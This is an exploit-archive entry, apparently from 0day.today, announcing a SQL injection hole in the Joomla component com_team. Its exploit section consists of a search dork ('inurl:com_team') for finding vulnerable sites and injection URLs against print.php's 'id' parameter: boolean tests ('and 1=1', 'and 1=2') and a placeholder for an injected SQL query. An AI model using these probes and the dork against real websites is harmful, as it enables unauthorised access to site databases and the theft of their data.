id: 16368
date: 06/19/2011
title: Joomla Component (com_team) SQL Injection Vulnerability
author: CoBRa_21
cves: 

********************************************************************************
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************
 
Author : CoBRa_21
 
Dork : inurl:com_team
 
********************************************************************************
Exploit
 
http://localhost/[PATH]/print.php?task=person&id=36 and 1=1
 
http://localhost/[PATH]/print.php?task=person&id=36 and 1=2
 
http://localhost/[PATH]/print.php?task=person&id=36 [SQL]
 
********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
******************************************************************************** 


#  0day.today [2023-03-27]  #